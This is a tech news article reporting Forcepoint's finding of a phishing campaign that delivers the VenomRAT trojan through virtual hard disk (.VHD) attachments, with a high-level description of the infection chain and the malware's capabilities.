Criminals are using a virtual hard disk image file to host and distribute dangerous malware

News
By published

Newly discovered phishing campaign utilizes a unique file type to spread

Pirate skull cyber attack digital technology flag cyber on on computer CPU in background. Darknet and cybercrime banner cyberattack and espionage concept illustration.
(Image credit: Shutterstock)
  • Forcepoint observes new phishing campaign distributing virtual hard disk files
  • The files bypass security protections to deploy the VenomRAT
  • Victims end up losing sensitive data, so be on your guard

Criminals are now using virtual hard disk image files to host and distribute dangerous malware, researchers from Forcepoint are saying.

In an in-depth analysis, Forcepoint said it observed a phishing campaign, themed as a purchase order. In the attachment of the email is an archive which, when extracted, shows a hard disk Image file (.VHD).

When the victim opens the file, it mounts itself as a hard drive, and runs a batch script that includes a series of obfuscations including garbage characters, Base64 and AES encryption files. The .BAT file drops the Venom Remote Access Trojan (RAT) and spawns a PowerShell script that uses the Pastebin service to host C2 and exfiltrate stolen data.

Working around security solutions

Forcepoint’s Prashant Kumar said the threat actors opted for a VHD file to work around any email security, or endpoint protection solutions the target may have installed on their device.

“Threat actors always like to find new ways to deliver malware undetected to target large communities,” Kumar said. “I’ll cover a current technique threat actors use to bypass security measures, deliver malware, infect systems and exfiltrate data—all by using a virtual hard disk image file to host and distribute the VenomRAT malware.”

VenomRAT is a type of Trojan that allows cybercriminals to take full control of an infected system. Once installed, it enables attackers to execute commands remotely, steal sensitive information, and manipulate the victim's computer without their knowledge. It is commonly used for keylogging and extracting saved credentials from web browsers and applications.

This malware is also capable of capturing screenshots and activating webcams, employs various persistence mechanisms, and can deploy additional malware. Because of its powerful capabilities, VenomRAT is often distributed through phishing emails, malicious downloads, and exploit kits that target system vulnerabilities.

You might also like

TOPICS
Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.

Read more
Hacker Typing
This devious two-step phishing campaign uses Microsoft tools to bypass email security
Russian flag on a laptop
Hackers are using Russian domains to launch complex document-based phishing attacks
A hacker typing on a MacBook laptop with code on the screen.
This devious phishing site repurposes legitimate web elements like CAPTCHA pages for malware distribution
A digital themed isometric showing a neon padlock in the foreground, and a technological diagram of a processor logic board in the background.
SVG files are offering cybercriminals an easy way in with new phishing attacks
email
A Windows filetype update may have complicated cyber threat detection efforts
Trojan
Microsoft warns of a devious new RAT malware which can avoid detection with apparent ease
Latest in Security
Pirate skull cyber attack digital technology flag cyber on on computer CPU in background. Darknet and cybercrime banner cyberattack and espionage concept illustration.
Criminals are using a virtual hard disk image file to host and distribute dangerous malware
A man holds a smartphone iPhone screen showing various social media apps including YouTube, TikTok, Facebook, Threads, Instagram and X
A worrying Apple Password App vulnerability reportedly left users exposed for months
DeepSeek
Fake DeepSeek installers are infecting your device with dangerous malware
AI tools.
Not even fairy tales are safe - researchers weaponise bedtime stories to jailbreak AI chatbots and create malware
Data leak
Top California sperm bank suffers embarrassing leak
An Android phone being held in the hand
These malicious Android apps were installed over 60 million times - here's how to stay safe
Latest in News
Pirate skull cyber attack digital technology flag cyber on on computer CPU in background. Darknet and cybercrime banner cyberattack and espionage concept illustration.
Criminals are using a virtual hard disk image file to host and distribute dangerous malware
Oracle
Oracle unveils multi-billion dollar investment in UK cloud and AI
Close up of PS5 DualSense controller leaning on a PS5
Sony patents PlayStation controller that you can charge by leaving in sunlight
Woman disgusted by her laptop
Embarrassing Windows 11 bug that deleted Copilot app is now fixed – but will anyone outside of Microsoft care?
The redisgned Plex app displayed across three iPhone screens
Plex is raising its prices and making a great key feature no longer free – here's why some subscribers are signing up to the Lifetime Pass before the rise
Canon March 2025 launch teaser
Canon teases two big vlogging camera launches for next week – and one looks to be the PowerShot V1
More about security
A man holds a smartphone iPhone screen showing various social media apps including YouTube, TikTok, Facebook, Threads, Instagram and X

A worrying Apple Password App vulnerability reportedly left users exposed for months
DeepSeek

Fake DeepSeek installers are infecting your device with dangerous malware
Close up of PS5 DualSense controller leaning on a PS5

Sony patents PlayStation controller that you can charge by leaving in sunlight
See more latest
Most Popular
Close up of PS5 DualSense controller leaning on a PS5
Sony patents PlayStation controller that you can charge by leaving in sunlight
The redisgned Plex app displayed across three iPhone screens
Plex is raising its prices and making a great key feature no longer free – here's why some subscribers are signing up to the Lifetime Pass before the rise
The Power Rangers posing in the Mighty Morphin' Power Rangers TV series.
'Go, go Power Rangers!' Disney+ is set to 'reinvent the franchise' as a new live-action Power Rangers show is in the works
Holding the Fujifilm GFX100 RF medium-format compact camera
I tried Fujifilm’s new medium-format GFX100RF, and it could just be the most desirable compact camera ever
Analogue 3D
You'll have to wait a bit longer if you've pre-ordered the Analogue 3D as shipping has been delayed until later this year
Woman disgusted by her laptop
Embarrassing Windows 11 bug that deleted Copilot app is now fixed – but will anyone outside of Microsoft care?
Oracle
Oracle unveils multi-billion dollar investment in UK cloud and AI
Canon March 2025 launch teaser
Canon teases two big vlogging camera launches for next week – and one looks to be the PowerShot V1
A collage of Eve Macarro in Ballerina and John Wick in his third film
New Ballerina movie trailer suggests Keanu Reeves' John Wick will have a bigger role to play in the spin-off film than we thought
The Oppo Reno 13 Pro in both purple and white against a rendered background
The Oppo Reno 13 Pro adds a far-reaching 3.5x zoom camera for a midrange price